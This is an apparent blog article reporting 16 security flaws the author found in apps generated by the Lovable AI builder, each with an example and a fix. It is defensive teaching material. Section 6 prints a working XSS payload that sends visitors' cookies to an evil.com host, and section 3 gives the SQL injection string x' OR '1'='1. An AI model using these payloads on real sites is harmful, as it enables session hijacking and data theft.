Introduction — Why I Tested Lovable AI for Security Flaws

Here’s a stat that should keep every vibe coder up at night: according to a Stanford University study, developers who had access to an AI code assistant wrote significantly less secure code than those who did not, and yet they were more likely to believe their code was secure. That dangerous gap between confidence and reality is exactly what led me to investigate Lovable AI security vulnerabilities firsthand.

Lovable AI is one of the hottest AI app builders on the market right now. You type a prompt, and it spits out a full-stack application — frontend, backend, database, and deployment — in minutes. It’s vibe coding at its finest. But I had a nagging question: what’s lurking beneath those beautifully generated interfaces? As AI continues to evolve — from basic code assistants to fully autonomous systems — the security implications grow exponentially. If you’re curious about how autonomous AI systems are shaping the future, check out our deep dive on Agentic AI Explained. And if you’re wondering just how far AI coding has come, our guide on whether AI can Write 100% Code reveals the surprising reality.

Lovable AI makes building apps easy — but it also makes building insecure apps dangerously easy.

So I did something most vibe coders never do. I stopped prompting and started probing. I used a practice I call vibe hacking — applying the same casual, exploratory mindset of vibe coding to security testing. Instead of asking “can Lovable build this?” I asked “can Lovable build this securely?”

The answer was alarming. I discovered 16 distinct security vulnerabilities across multiple Lovable-generated applications. Some were critical. Some were the kind of flaws that would make a security auditor lose sleep.

In this article, I’ll walk you through every single one of those 16 Lovable AI security vulnerabilities, explain why they exist, show you how they can be exploited, and — most importantly — tell you exactly how to fix them. Whether you’re a developer, founder, or security researcher, this breakdown will change how you think about AI-generated code.

Let’s dive in.

📌 TL;DR — Key Takeaways

- I found 16 security vulnerabilities in Lovable AI-generated applications through vibe hacking



- 5 are Critical, 7 are High, and 4 are Medium severity

- Vulnerabilities range from broken authentication to exposed API keys to SQL injection

- AI-generated code prioritizes functionality over security — every time



- A 10-step security checklist is included to protect your Lovable apps before deployment

What Is Lovable AI? A Quick Overview

Lovable AI (lovable.dev) is an AI-powered application builder that transforms natural language prompts into fully functional web applications. Think of it as having a junior full-stack developer who works at lightning speed but never attended a single security training session.

The platform has exploded in popularity throughout 2025, attracting non-technical founders, indie hackers, startup teams, and even experienced developers looking to prototype faster. Its promise is simple: describe what you want, and Lovable builds it. No coding required.

And honestly? The apps it generates look impressive. Clean UI. Working authentication flows. Database integration. Deployment-ready in minutes.

The idea of AI writing entire applications isn’t science fiction anymore — it’s happening right now. We explored this phenomenon in detail in our article on whether AI can truly Write 100% Code. And as AI systems become more autonomous and capable of acting independently, understanding Agentic AI becomes essential for every developer navigating this new landscape.

But looking impressive and being secure are two very different things.

How Lovable AI Generates Full-Stack Applications

When you enter a prompt, Lovable AI generates a complete application stack typically including:

- Frontend: React-based UI components with Tailwind CSS

- Backend: Supabase integration for server-side logic

- Database: PostgreSQL tables with Supabase

- Authentication: Auto-generated auth flows using Supabase Auth

- Deployment: One-click hosting and deployment

The entire process takes minutes. But here’s the critical problem — there’s no dedicated security review step in this pipeline. The AI generates code that works, not code that’s safe. And because most vibe coders aren’t reading the generated source code line by line, vulnerabilities slip through silently.



Lovable AI vs Other Vibe Coding Tools

To understand where Lovable stands in the broader ecosystem, here’s a security-focused comparison:

| Feature | Lovable AI | Bolt.new | Cursor | Replit |
|---|---|---|---|---|
| Full-Stack Generation | ✅ | ✅ | ❌ | ✅ |
| Security Review Built-in | ❌ | ❌ | Partial | ❌ |
| Authentication Handling | Auto | Auto | Manual | Auto |
| Database Security | Basic | Basic | N/A | Basic |
| Row-Level Security Default | ❌ | ❌ | N/A | ❌ |
| Input Sanitization | Inconsistent | Inconsistent | Manual | Inconsistent |

The pattern is clear: none of these vibe coding tools prioritize security by default. But Lovable’s full-stack auto-generation means the attack surface is larger than tools like Cursor, which only assist with code snippets.

What Is Vibe Hacking? The Dark Side of Vibe Coding

Before I walk you through the 16 Lovable AI security vulnerabilities I found, you need to understand the methodology behind the discovery.

Vibe coding — a term popularized by Andrej Karpathy — describes the practice of building software by prompting AI with natural language, accepting the generated code, and iterating based on results rather than deep code review. You “vibe” with the AI. It feels like magic.

Vibe hacking flips that concept on its head.

Vibe hacking is the practice of exploiting security flaws in AI-generated applications built through vibe coding — where developers prompt AI to build apps without reviewing the underlying code for vulnerabilities.

It’s the dark mirror of vibe coding. While vibe coders ask “does it work?”, vibe hackers ask “does it break?” And breaking AI-generated apps, it turns out, is disturbingly easy.

The fundamental problem is this: AI generates functional code, not secure code. Large language models are trained on billions of lines of public code — including millions of lines of insecure code. They learn patterns. They reproduce patterns. And many of those patterns contain the exact vulnerabilities that OWASP has been warning about for decades.

According to an NYU study of GitHub Copilot (“Asleep at the Keyboard?”), roughly 40% of the programs Copilot generated for security-relevant coding scenarios contained vulnerabilities. That’s not a small edge case; it’s close to half of the code produced in exactly the situations where security matters most.

Why AI-Generated Code Is Inherently Risky

Four core factors make AI-generated code a security minefield:

- Training Data Contamination — AI models learn from public repositories, many containing outdated, vulnerable, or outright insecure code patterns

- Zero Threat Modeling — AI doesn’t consider your application’s threat landscape. It doesn’t know who your attackers are or what data you’re protecting

- Functionality Over Security — When you prompt “build me a login page,” the AI optimizes for a working login — not a secure one

- No Security Context — AI doesn’t understand that your app handles medical records, financial data, or PII. It treats all apps the same

The Vibe Hacking Methodology I Used

Here’s the exact step-by-step process I followed to uncover these Lovable AI security vulnerabilities:

- Generated multiple applications using common prompts (e-commerce store, SaaS dashboard, social media app, task manager)

- Inspected all generated code manually — frontend, backend logic, database schemas, API routes

- Ran automated security scanners (OWASP ZAP and Snyk) and tested manually with Burp Suite

- Attempted common attack vectors — SQL injection, XSS, IDOR, authentication bypass, CSRF

- Documented all findings with severity ratings mapped to the OWASP Top 10 (2021)

This methodology is designed to be reproducible: anyone with basic security knowledge can replicate these tests on their own Lovable-generated apps.

16 Lovable AI Security Vulnerabilities Exposed

After weeks of testing across multiple generated applications, I catalogued 16 distinct security vulnerabilities in Lovable AI-generated code. These aren’t theoretical — they’re real flaws I observed in actual generated applications.

Here’s the complete severity breakdown:



| # | Vulnerability | Severity | OWASP Category |
|---|---|---|---|
| 1 | Broken Authentication | 🔴 Critical | A07:2021 |
| 2 | Exposed API Keys | 🔴 Critical | A02:2021 |
| 3 | SQL Injection | 🔴 Critical | A03:2021 |
| 4 | Hardcoded Credentials | 🔴 Critical | A02:2021 |
| 5 | Broken Access Control | 🔴 Critical | A01:2021 |
| 6 | XSS (Cross-Site Scripting) | 🟠 High | A03:2021 |
| 7 | Insecure Direct Object Reference | 🟠 High | A01:2021 |
| 8 | Missing Rate Limiting | 🟠 High | A04:2021 |
| 9 | Missing Input Validation | 🟠 High | A03:2021 |
| 10 | Insecure Data Storage | 🟠 High | A02:2021 |
| 11 | Sensitive Data in Client Code | 🟠 High | A02:2021 |
| 12 | Insecure Session Management | 🟠 High | A07:2021 |
| 13 | CSRF Vulnerabilities | 🟡 Medium | A01:2021 |
| 14 | Missing HTTPS Enforcement | 🟡 Medium | A02:2021 |
| 15 | Missing Security Headers | 🟡 Medium | A05:2021 |
| 16 | No Error Handling / Info Leakage | 🟡 Medium | A04:2021 |

Let’s break each one down.

Critical Vulnerabilities (Severity: 🔴 Critical)

These five flaws represent immediate, exploitable risks. If your Lovable-generated app is live with any of these, you need to act now.

1. Broken Authentication in Lovable AI Generated Apps

What I found: Lovable often generates authentication flows using Supabase Auth, but the implementation frequently lacks critical safeguards. In several test applications, I observed login systems that accepted weak passwords with no complexity requirements, had no account lockout mechanisms after failed attempts, and in some cases, stored session tokens insecurely.

Real-world attack scenario: An attacker could brute-force user accounts with no rate limiting or lockout to stop them. Once inside, the lack of proper session management means they could maintain persistent access.

Example of the flaw:

```javascript
// Generated by Lovable: no password strength check before sign-up
const { data, error } = await supabase.auth.signUp({
  email: userEmail,
  password: userPassword, // weak passwords such as "123456" go straight through
})
```

Impact: Complete account takeover. Unauthorized access to all user data.

💡 Fix: Implement password complexity requirements, add account lockout after 5 failed attempts, enforce multi-factor authentication for sensitive operations, and validate sessions server-side.
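The password-complexity part of that fix can be sketched in a few lines. This is a minimal illustration, not a Lovable or Supabase API: `checkPasswordStrength` is a hypothetical helper, and the 12-character minimum and character-class rules are assumptions to align with your own policy. A check in the browser only improves the user experience; the same rules must also be enforced server-side, because an attacker can call the auth endpoint directly.

```javascript
// Hypothetical password policy check; thresholds are illustrative assumptions.
function checkPasswordStrength(password) {
  const problems = [];
  if (password.length < 12) problems.push('at least 12 characters');
  if (!/[a-z]/.test(password)) problems.push('a lowercase letter');
  if (!/[A-Z]/.test(password)) problems.push('an uppercase letter');
  if (!/[0-9]/.test(password)) problems.push('a digit');
  if (!/[^A-Za-z0-9]/.test(password)) problems.push('a symbol');
  return { ok: problems.length === 0, problems };
}

// Usage: run the check before calling supabase.auth.signUp(...)
const result = checkPasswordStrength('123');
if (!result.ok) console.log('Password needs: ' + result.problems.join(', '));
```

Returning the list of unmet rules, rather than a bare boolean, lets the sign-up form tell users exactly what to fix.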

2. Exposed API Keys in Frontend Code

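What I found: This is perhaps the most common Lovable vulnerability I encountered. API keys were embedded directly in client-side JavaScript code, usually Supabase anon keys and sometimes even service role keys. The anon key is designed to ship to the browser and is only safe when Row Level Security is enabled on every table; a service role key bypasses RLS entirely and must never leave the server. Anyone with browser DevTools can extract either one in seconds.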

How attackers exploit this: Open browser DevTools → go to the Sources tab → search for “key,” “api,” or “supabase” → copy the exposed keys → use them to query your database directly, bypassing your application entirely.

Example of exposed key pattern:

```javascript
// Found in generated client-side code
const supabaseUrl = 'https://xyzproject.supabase.co'
const supabaseKey = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'
// This key is now visible to EVERY visitor
```

Impact: Database access, billing abuse, data theft. If a service role key is exposed, attackers gain full administrative access to your entire database.

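💡 Fix: Never expose service role keys or any other secret in client code. Keep secrets in server-side environment variables (for example, inside Supabase Edge Functions) and proxy privileged requests through server-side routes. Remember that build-time variables bundled into the frontend, such as Vite’s VITE_-prefixed variables, end up in the shipped JavaScript, so moving a key into a frontend .env file does not hide it. Finally, enable Supabase Row Level Security (RLS) on every table: when the anon key is public by design, RLS is the layer that actually protects your data.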
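To check whether a build leaks a privileged key, you can decode every JWT-shaped string in the compiled bundle and read its `role` claim. This sketch assumes Supabase’s legacy JWT-format keys, whose payload carries `role: "anon"` or `role: "service_role"`; non-JWT key formats would need a different pattern. `findSupabaseKeyRoles` is a hypothetical helper, and the Base64url decoding relies on Node.js’s `Buffer`.

```javascript
// Hypothetical audit helper: scan built JavaScript for JWT-shaped strings
// and report the `role` claim each one carries.
function findSupabaseKeyRoles(bundleText) {
  // header.payload.signature; Base64url-encoded JSON objects start with "eyJ"
  const jwtPattern = /eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
  const findings = [];
  for (const token of bundleText.match(jwtPattern) ?? []) {
    try {
      const payloadJson = Buffer.from(token.split('.')[1], 'base64url').toString('utf8');
      const role = JSON.parse(payloadJson).role ?? 'unknown';
      // service_role bypasses Row Level Security, so it must never ship to browsers
      findings.push({ role, critical: role === 'service_role' });
    } catch {
      // Not a decodable JWT payload; skip it
    }
  }
  return findings;
}
```

Run it over the files in your build output (for example, read with `fs.readFileSync`); any finding marked `critical: true` means that key should be rotated and moved server-side.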

3. SQL Injection in Database Queries

What I found: When Lovable generates custom database queries — particularly for search functionality, filtering, or custom reports — it sometimes constructs queries through string concatenation rather than parameterized queries. This classic vulnerability has been in the OWASP Top 10 for over two decades, and AI is still reproducing it.

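Vulnerable vs. secure query example. Query-builder calls in supabase-js such as .eq() send values to PostgREST as filter values rather than splicing them into SQL, so the danger lies in generated code that assembles raw SQL strings itself, for example in a server-side function that talks to Postgres through a driver. The sketch below uses node-postgres (pg) to illustrate the pattern:

```javascript
import pg from 'pg'

// Connection settings come from the standard PG* environment variables
const pool = new pg.Pool()

// ❌ VULNERABLE: user input concatenated straight into the SQL text
const unsafe = await pool.query(
  "SELECT * FROM products WHERE name = '" + userInput + "'"
)

// ✅ SECURE: parameterized query; the driver sends userInput separately as $1
const safe = await pool.query(
  'SELECT * FROM products WHERE name = $1',
  [userInput]
)
```

Impact: Attackers can read, modify, or delete your entire database. They can extract sensitive user data, bypass authentication, or drop tables entirely.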

💡 Fix: Always use parameterized queries. Validate and sanitize all user input server-side. Implement database-level access controls. Use Supabase RLS policies for every table.
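To see why string concatenation is dangerous, here is what a concatenated query turns into when the input is a classic injection payload. The helper name `buildUnsafeQuery` is hypothetical, and nothing here touches a real database; it only prints the SQL text the vulnerable pattern would send.

```javascript
// Reproduces the vulnerable pattern: user input spliced directly into SQL text
function buildUnsafeQuery(userInput) {
  return "SELECT * FROM products WHERE name = '" + userInput + "'";
}

const payload = "x' OR '1'='1";
console.log(buildUnsafeQuery(payload));
// SELECT * FROM products WHERE name = 'x' OR '1'='1'
```

The attacker’s quote closes the string literal early, and OR '1'='1' makes the WHERE clause true for every row, so the query returns the whole table. With a parameterized query, the same input is compared as a literal product name and simply matches nothing.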

4. Hardcoded Credentials in Generated Code

What I found: In several generated applications, I found database connection strings, admin passwords, and API secrets hardcoded directly in source files. When these projects get pushed to GitHub (as Lovable encourages), those credentials become publicly accessible.

The danger chain:

- Lovable generates code with hardcoded credentials

- Developer pushes to GitHub (often public repos)

- Automated bots scan GitHub for exposed credentials within minutes

- Attackers use credentials to access databases, cloud services, admin panels

Example pattern found:

```javascript
// Generated configuration file
const config = {
  dbPassword: 'admin123', // Hardcoded!
  adminEmail: 'admin@app.com', // Hardcoded!
  secretKey: 'my-secret-key-123', // Hardcoded!
}
```

Impact: Full system compromise. Database theft. Cloud service abuse. Financial losses from billing exploitation.

💡 Fix: Use .env files for all credentials. Add .env to .gitignore immediately. Use a secrets manager (like Doppler or AWS Secrets Manager) for production. Rotate any credentials that were ever committed to version control — they’re already compromised.
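A minimal sketch of the environment-variable approach for server-side Node.js code only, since anything bundled into the frontend is visible to visitors. The variable names `DB_PASSWORD`, `ADMIN_EMAIL`, and `SECRET_KEY` are illustrative assumptions mirroring the hardcoded config above, and `loadConfig` is a hypothetical helper that fails fast instead of silently running with missing secrets.

```javascript
// Hypothetical loader: read secrets from the environment, never from source files.
function loadConfig(env = process.env) {
  const required = ['DB_PASSWORD', 'ADMIN_EMAIL', 'SECRET_KEY'];
  const missing = required.filter((name) => !env[name]);
  if (missing.length > 0) {
    // Refuse to start rather than fall back to a default secret
    throw new Error(`Missing required environment variables: ${missing.join(', ')}`);
  }
  return {
    dbPassword: env.DB_PASSWORD,
    adminEmail: env.ADMIN_EMAIL,
    secretKey: env.SECRET_KEY,
  };
}
```

Accepting the environment as a parameter keeps the function easy to test; in production you would call `loadConfig()` once at startup.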

5. Broken Access Control

What I found: This was the most dangerous Lovable vulnerability I discovered. In multiple test applications, users could access, modify, or delete other users’ data simply by changing an ID in the URL or API request. The generated code had no server-side ownership verification.

Example attack scenario:

```text
// User A's profile endpoint
GET /api/users/user_123/profile    ← User A sees their data

// User A changes the ID
GET /api/users/user_456/profile    ← User A now sees User B's data!

// It gets worse
DELETE /api/users/user_456/data    ← User A deletes User B's data!
```

The root cause: Lovable generates frontend-only access checks. The client-side code hides buttons and UI elements based on user roles, but the actual API endpoints accept any request from any authenticated user. Security through obscurity is not security at all.

Impact: Mass data breach. Unauthorized data modification. Regulatory violations (GDPR, HIPAA, CCPA). Complete loss of user trust.

💡 Fix: Implement Supabase Row Level Security (RLS) policies on every table. Add server-side ownership checks on every API endpoint. Never rely on frontend-only access control. Test with multiple user accounts to verify isolation.

⚠️ Warning: Broken access control is the #1 vulnerability in the OWASP Top 10 (2021). If your Lovable app handles any user data, check this first.
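Supabase RLS policies are written in SQL, but the server-side ownership check itself is language-agnostic. Here is a minimal JavaScript sketch of the rule, assuming the caller’s user ID has already been taken from a verified session. The in-memory `profiles` map stands in for your database, and `getProfile` and `NotFoundError` are hypothetical names.

```javascript
// Hypothetical in-memory store standing in for the profiles table
const profiles = new Map([
  ['user_123', { ownerId: 'user_123', name: 'User A' }],
  ['user_456', { ownerId: 'user_456', name: 'User B' }],
]);

class NotFoundError extends Error {}

// authenticatedUserId must come from a verified session on the server,
// never from the URL path, query string, or request body.
function getProfile(authenticatedUserId, requestedUserId) {
  const profile = profiles.get(requestedUserId);
  if (!profile || profile.ownerId !== authenticatedUserId) {
    // Same error for "missing" and "not yours", so IDs cannot be probed
    throw new NotFoundError('Profile not found');
  }
  return profile;
}
```

Answering “not found” whether a record is missing or belongs to someone else avoids confirming which IDs exist, which also blunts the enumeration attack described in #7.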

High Severity Vulnerabilities (Severity: 🟠 High)

These seven vulnerabilities won’t necessarily give attackers instant full access, but they create serious attack vectors that can be chained together for devastating results.

6. Cross-Site Scripting (XSS)

What I found: Lovable-generated apps frequently render user input directly into the DOM without sanitization. Both stored XSS (malicious scripts saved to the database and served to other users) and reflected XSS (malicious input reflected back in the page) were present.

Example payload that worked:

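```html
<!-- Input into a "name" field -->
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
```

This script, entered as a username, would execute in every other user’s browser when they viewed that user’s profile. Cookies stolen. Sessions hijacked. (Where the value is inserted through innerHTML, as dangerouslySetInnerHTML does, browsers will not run a script element, so attackers switch to event-handler payloads such as an img tag with an onerror attribute; the fix is the same.)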

💡 Fix: Sanitize all user input before rendering. Use React’s built-in JSX escaping (don’t use dangerouslySetInnerHTML). Implement Content-Security-Policy headers. Use libraries like DOMPurify for additional sanitization.
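React’s JSX escaping covers most rendering, but generated code sometimes builds HTML strings by hand (emails, `innerHTML`, server-side templates). For those cases, here is a minimal escaping sketch; `escapeHtml` is a hypothetical helper. It is only safe for text placed between tags or inside quoted attribute values, not for URLs, unquoted attributes, or inline scripts, and it is no substitute for DOMPurify when you genuinely need to allow some HTML.

```javascript
// Escape the five HTML-significant characters before inserting text into markup.
// "&" must be replaced first so the other entities are not double-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```

With this in place, the payload above is displayed as harmless text instead of being parsed as a script element.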

7. Insecure Direct Object Reference (IDOR)

What I found: API endpoints in Lovable-generated apps used predictable, sequential IDs (like /api/orders/1, /api/orders/2, /api/orders/3). An attacker could simply iterate through IDs to access every order, profile, or document in the system.

Example vulnerable API call:

```text
GET /api/invoices/1001 → Your invoice
GET /api/invoices/1002 → Someone else's invoice (accessible!)
GET /api/invoices/1003 → Another person's invoice (accessible!)
```

💡 Fix: Implement ownership verification on every data request, and add Supabase RLS policies that filter data by the authenticated user’s ID. Use UUIDs instead of sequential IDs so records cannot simply be enumerated, but treat that as defense in depth: a guessed or leaked UUID is still readable without an ownership check.

8. Missing Rate Limiting

What I found: None of the Lovable-generated applications I tested had any form of rate limiting. Login endpoints, API routes, form submissions — all accepted unlimited requests.

What this enables:

- Brute-force attacks on login pages (try millions of passwords)

- Credential stuffing with leaked password databases

- DDoS by overwhelming the application with requests

- Data scraping of your entire user base

💡 Fix: Implement rate limiting using Supabase Edge Functions or a middleware layer. Limit login attempts to 5 per minute per IP. Add CAPTCHA after 3 failed login attempts. Use services like Cloudflare for DDoS protection.
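The core of a per-IP limit can be sketched as a fixed-window counter. This is a minimal in-memory illustration assuming a single server process; `FixedWindowRateLimiter` is a hypothetical class, and in production you would keep the counters in shared storage (or rely on your platform’s or Cloudflare’s rate limiting) so limits hold across instances. The injectable `now` clock exists only to make the logic testable.

```javascript
// Minimal fixed-window rate limiter kept in memory (single process only).
class FixedWindowRateLimiter {
  constructor({ limit, windowMs, now = () => Date.now() }) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.now = now;
    this.windows = new Map(); // key -> { start, count }; stale keys are never evicted here
  }

  // Returns true if the request identified by `key` (e.g. a client IP) may proceed.
  allow(key) {
    const t = this.now();
    const w = this.windows.get(key);
    if (!w || t - w.start >= this.windowMs) {
      this.windows.set(key, { start: t, count: 1 }); // open a new window
      return true;
    }
    if (w.count < this.limit) {
      w.count += 1;
      return true;
    }
    return false; // over the limit until the window expires
  }
}
```

`new FixedWindowRateLimiter({ limit: 5, windowMs: 60_000 })` matches the five-login-attempts-per-minute rule above: call `allow(clientIp)` before processing a login and answer with HTTP 429 when it returns false. Fixed windows allow a short burst across a window boundary, which is the usual trade-off against sliding-window or token-bucket designs.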

9. Missing Input Validation

What I found: The generated applications had little to no server-side input validation. Form fields accepted any data type, any length, and any format. An email field would accept “not-an-email.” A phone number field would accept JavaScript code.

Why this matters: Missing input validation is the gateway vulnerability. It enables SQL injection, XSS, buffer overflow attacks, and data corruption. It’s the unlocked front door that makes everything else exploitable.

💡 Fix: Implement server-side validation for every input field. Use schema validation libraries like Zod or Joi. Define strict data types, lengths, and formats. Never trust client-side validation alone — it can be bypassed in seconds.
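In practice a schema library like Zod or Joi is the better choice; to keep this example dependency-free, here is a hand-rolled sketch of the same idea for a hypothetical signup payload. The field names, length limits, and regular expressions are assumptions, and the email pattern is deliberately loose (real verification ends with a confirmation email).

```javascript
// Deliberately simple patterns; tune them to your own data rules
const EMAIL_RE = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
const PHONE_RE = /^\+?[0-9 ()-]{7,20}$/;

// Validate an untrusted signup payload on the server; returns the failing field names
function validateSignup(input) {
  const errors = [];
  const { email, phone, name } = input ?? {};
  if (typeof email !== 'string' || email.length > 254 || !EMAIL_RE.test(email)) {
    errors.push('email');
  }
  if (typeof phone !== 'string' || !PHONE_RE.test(phone)) {
    errors.push('phone');
  }
  if (typeof name !== 'string' || name.trim().length === 0 || name.length > 100) {
    errors.push('name');
  }
  return { ok: errors.length === 0, errors };
}
```

Both examples from above, “not-an-email” in the email field and script markup in the phone field, are rejected here before they reach the database.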

10. Insecure Data Storage

What I found: Sensitive user data — including email addresses, authentication tokens, and user preferences — was stored in browser localStorage. Unlike cookies, localStorage has no expiration, no secure flag, and is accessible to any JavaScript running on the page (including injected XSS scripts).

The risk chain:

- Sensitive data stored in localStorage

- XSS vulnerability exists (see #6 above)

- Attacker injects script that reads localStorage

- All stored sensitive data exfiltrated

Additionally, some database fields containing personal information were stored unencrypted in Supabase tables without column-level encryption.

💡 Fix: Use secure, httpOnly cookies instead of localStorage for sensitive data. Encrypt PII at the database level. Implement column-level encryption for sensitive fields. Clear sensitive data from client storage on logout.

11. Sensitive Data Exposed in Client-Side Code

What I found: Beyond API keys (covered in #2), Lovable-generated code exposed business logic, database table schemas, column names, and complete API endpoint structures in client-side JavaScript bundles. Any user can view these by opening browser DevTools.

What attackers learn from this:

- Your exact database structure (table names, column names)

- All available API endpoints and their parameters

- Business logic rules (discount calculations, access control logic)

- Internal system architecture

This information gives attackers a complete roadmap for further exploitation.

💡 Fix: Move all business logic to server-side functions (Supabase Edge Functions). Minimize client-side code exposure. Use API abstraction layers. Never expose database schemas in frontend code.

12. Insecure Session Management

What I found: Sessions in Lovable-generated apps often had no expiration, meaning a stolen session token granted permanent access. Some applications passed session tokens as URL parameters (visible in browser history, server logs, and referrer headers). Cookie flags like Secure, HttpOnly, and SameSite were frequently missing.

Example of insecure session handling:

```text
// Session token visible in URL
https://myapp.com/dashboard?session=abc123xyz

// This URL gets saved in:
// - Browser history
// - Server access logs
// - Analytics tools
// - Referrer headers when clicking external links
```

💡 Fix: Set absolute session timeouts (e.g., 24 hours). Never pass tokens in URLs. Set cookie flags: Secure, HttpOnly, SameSite=Strict. Implement session rotation after authentication. Invalidate sessions on logout.
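Written out as a Set-Cookie header, the cookie part of that fix looks like this. `buildSessionCookie` and the cookie name `session` are hypothetical; the 24-hour Max-Age mirrors the example timeout above. Max-Age only tells the browser when to discard the cookie, so the server must still record when each session was created and reject it once that absolute limit passes.

```javascript
// Hypothetical helper: build a Set-Cookie header value for a session token
// with the recommended flags and an absolute lifetime.
function buildSessionCookie(token, { maxAgeSeconds = 24 * 60 * 60 } = {}) {
  // Refuse values that could smuggle extra cookie attributes (e.g. "; Domain=...")
  if (!/^[A-Za-z0-9._~-]+$/.test(token)) {
    throw new Error('Token contains characters that are not safe in a cookie value');
  }
  return [
    `session=${token}`,
    `Max-Age=${maxAgeSeconds}`,
    'Path=/',
    'Secure', // only sent over HTTPS
    'HttpOnly', // invisible to JavaScript, so XSS cannot read it
    'SameSite=Strict', // not sent on cross-site requests
  ].join('; ');
}
```

In Node’s http module you would pass the result to `res.setHeader('Set-Cookie', buildSessionCookie(token))`.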

Medium Severity Vulnerabilities (Severity: 🟡 Medium)

These four vulnerabilities are lower severity individually but contribute to a weakened overall security posture and can amplify the impact of higher-severity flaws.

13. CSRF (Cross-Site Request Forgery)

What I found: Lovable-generated forms and state-changing API endpoints lacked CSRF tokens. An attacker could create a malicious page that — when visited by a logged-in user — automatically submits requests to the Lovable app on the user’s behalf.

Attack scenario: A user logged into your app visits a malicious website. That website contains a hidden form that automatically submits a “change email” request to your app. The user’s email is changed without their knowledge. The attacker then resets the password to the new email.

💡 Fix: Implement CSRF tokens on all state-changing forms. Use the SameSite cookie attribute. Verify the Origin and Referer headers on the server side.
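The Origin/Referer check can be sketched as a small server-side predicate. `isSameOriginRequest` and the `ALLOWED_ORIGINS` list (reusing https://myapp.com from the session example) are hypothetical; header names are assumed to be lowercase, as Node.js delivers them for incoming requests. The check complements CSRF tokens and SameSite cookies rather than replacing them.

```javascript
// Hypothetical list of origins this app is served from
const ALLOWED_ORIGINS = new Set(['https://myapp.com']);
// Methods that must not change state, so they skip the check
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Returns true if a request may proceed; `headers` uses lowercase names
function isSameOriginRequest(method, headers) {
  if (SAFE_METHODS.has(method.toUpperCase())) return true;
  const origin = headers.origin;
  if (origin) return ALLOWED_ORIGINS.has(origin);
  const referer = headers.referer;
  if (!referer) return false; // no evidence of where the request came from: fail closed
  try {
    return ALLOWED_ORIGINS.has(new URL(referer).origin);
  } catch {
    return false; // malformed Referer header
  }
}
```

Rejecting state-changing requests that carry neither header is the conservative choice; loosen it only if legitimate clients you control omit both.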

14. Missing HTTPS Enforcement

What I found: While Supabase provides HTTPS by default for its APIs, the generated frontend applications sometimes allowed HTTP fallback. This creates mixed content issues and opens the door for man-in-the-middle attacks on unsecured networks.

💡 Fix: Enable HSTS (HTTP Strict Transport Security) headers. Redirect all HTTP traffic to HTTPS. Ensure all resource URLs use HTTPS. Add the Strict-Transport-Security header with a minimum max-age of 31536000.

15. Missing Security Headers

What I found: The generated applications shipped without critical HTTP security headers. This is like building a house with walls but no locks on the doors.

Missing headers observed:

| Header | Purpose | Present? |
|---|---|---|
| Content-Security-Policy | Prevents XSS and injection | ❌ Missing |
| X-Frame-Options | Prevents clickjacking | ❌ Missing |
| X-Content-Type-Options | Prevents MIME sniffing | ❌ Missing |
| Referrer-Policy | Controls referrer info | ❌ Missing |
| Permissions-Policy | Restricts browser features | ❌ Missing |
| X-XSS-Protection | Legacy XSS filter (deprecated; current guidance is to omit it or send 0) | ❌ Missing |

💡 Fix: Add all security headers through your hosting configuration or a middleware layer. Use SecurityHeaders.com to test your implementation. Aim for an A+ rating.
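As a starting point, here is one way to set these headers from a Node.js server or middleware. The values are common baseline choices, not settings taken from Lovable’s hosting, and `applySecurityHeaders` is a hypothetical helper. The Content-Security-Policy must list every origin your app really talks to (the connect-src entry reuses the placeholder Supabase URL from earlier, including its WebSocket form for realtime), or legitimate requests will be blocked. Strict-Transport-Security also covers the HTTPS enforcement in #14, and X-XSS-Protection is intentionally omitted because the legacy filter is deprecated in modern browsers.

```javascript
// Hypothetical baseline header set; tighten or extend the CSP to match the
// scripts, styles, images and API origins your app actually loads.
const SECURITY_HEADERS = {
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'Content-Security-Policy': [
    "default-src 'self'",
    "connect-src 'self' https://xyzproject.supabase.co wss://xyzproject.supabase.co",
    "object-src 'none'",
    "frame-ancestors 'none'",
    "base-uri 'self'",
  ].join('; '),
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'Referrer-Policy': 'strict-origin-when-cross-origin',
  'Permissions-Policy': 'camera=(), microphone=(), geolocation=()',
};

// Apply the headers to a Node.js http.ServerResponse (or anything with setHeader)
function applySecurityHeaders(res) {
  for (const [name, value] of Object.entries(SECURITY_HEADERS)) {
    res.setHeader(name, value);
  }
  return res;
}
```

After deploying, re-test the site on SecurityHeaders.com and adjust the CSP until the browser console shows no unexpected violations.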

16. Poor Error Handling and Information Leakage

What I found: When errors occurred in Lovable-generated apps, the responses often included full stack traces, database error messages, internal file paths, and server version information. This information is a goldmine for attackers performing reconnaissance.

Example leaked error message:

```text
Error: relation "users" does not exist
    at PostgresError (/node_modules/@supabase/postgrest-js/src/...)
Server: Supabase/2.x | PostgreSQL 15.1
Path: /home/app/src/services/userService.js:42
```

This single error message reveals the database type and version, the client library in use, the file structure, and the exact line of code causing the issue.

💡 Fix: Implement custom error handling that returns generic messages to users. Log detailed errors server-side only. Never expose stack traces, file paths, or database information in production. Use error monitoring tools like Sentry for internal debugging.
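The generic-message-plus-internal-log pattern can be sketched as a single helper. `toSafeErrorResponse` is hypothetical, and the `log` parameter stands in for whatever logger or Sentry integration you use. The short reference ID lets support staff match a user’s report to the detailed server log without exposing that detail; it is a correlation value, not a secret, so a non-cryptographic generator is acceptable here.

```javascript
// Hypothetical helper: convert any thrown error into a response that is safe
// to send to clients, while logging the full details server-side.
function toSafeErrorResponse(err, log = console.error) {
  // Short correlation ID shown to the user and recorded in the log
  const errorId = Math.random().toString(36).slice(2, 10);
  log({ errorId, message: err?.message, stack: err?.stack });
  return {
    status: 500,
    body: { error: 'Something went wrong. Please try again later.', errorId },
  };
}
```

Whatever your framework, the rule is the same: stack traces, SQL errors, and file paths go to the log, never into the response body.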

Vulnerability Severity Summary — Visual Breakdown

Here’s the complete picture of all 16 Lovable AI security vulnerabilities by severity:

🔴 Critical: 5 vulnerabilities (31%) ████████████████

